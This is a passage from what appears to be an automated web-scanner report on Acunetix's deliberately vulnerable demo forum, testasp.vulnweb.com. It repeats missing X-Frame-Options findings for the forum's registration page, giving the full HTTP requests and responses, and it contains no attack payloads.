ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory 